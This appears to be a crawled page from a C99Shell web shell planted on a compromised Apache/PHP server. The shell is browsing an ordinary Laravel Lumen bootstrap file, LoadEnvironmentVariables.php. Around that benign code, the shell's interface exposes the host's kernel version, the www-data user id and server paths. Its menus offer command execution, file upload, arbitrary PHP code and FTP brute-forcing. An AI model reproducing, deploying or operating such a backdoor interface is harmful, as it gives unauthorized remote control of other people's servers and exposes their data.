!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache/2.4.41 (Ubuntu). PHP/8.0.30 

uname -a: Linux apirnd 5.4.0-204-generic #224-Ubuntu SMP Thu Dec 5 13:38:28 UTC 2024 x86_64 

uid=33(www-data) gid=33(www-data) groups=33(www-data) 

Safe-mode: OFF (not secure)

/var/www/html/notification/vendor/laravel/lumen-framework/src/Bootstrap/   drwxr-xr-x
Free 13.06 GB of 57.97 GB (22.53%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     LoadEnvironmentVariables.php (1.79 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

namespace Laravel\Lumen\Bootstrap;

use 
Dotenv\Dotenv;
use 
Dotenv\Exception\InvalidFileException;
use 
Illuminate\Support\Env;
use 
Symfony\Component\Console\Output\ConsoleOutput;

class 
LoadEnvironmentVariables
{
    
/**
     * The directory containing the environment file.
     *
     * @var string
     */
    
protected $filePath;

    
/**
     * The name of the environment file.
     *
     * @var string|null
     */
    
protected $fileName;

    
/**
     * Create a new loads environment variables instance.
     *
     * @param  string  $path
     * @param  string|null  $name
     * @return void
     */
    
public function __construct($path$name null)
    {
        
$this->filePath $path;
        
$this->fileName $name;
    }

    
/**
     * Setup the environment variables.
     *
     * If no environment file exists, we continue silently.
     *
     * @return void
     */
    
public function bootstrap()
    {
        try {
            
$this->createDotenv()->safeLoad();
        } catch (
InvalidFileException $e) {
            
$this->writeErrorAndDie([
                
'The environment file is invalid!',
                
$e->getMessage(),
            ]);
        }
    }

    
/**
     * Create a Dotenv instance.
     *
     * @return \Dotenv\Dotenv
     */
    
protected function createDotenv()
    {
        return 
Dotenv::create(
            
Env::getRepository(),
            
$this->filePath,
            
$this->fileName
        
);
    }

    
/**
     * Write the error information to the screen and exit.
     *
     * @param  string[]  $errors
     * @return void
     */
    
protected function writeErrorAndDie(array $errors)
    {
        
$output = (new ConsoleOutput)->getErrorOutput();

        foreach (
$errors as $error) {
            
$output->writeln($error);
        }

        exit(
1);
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0044 ]--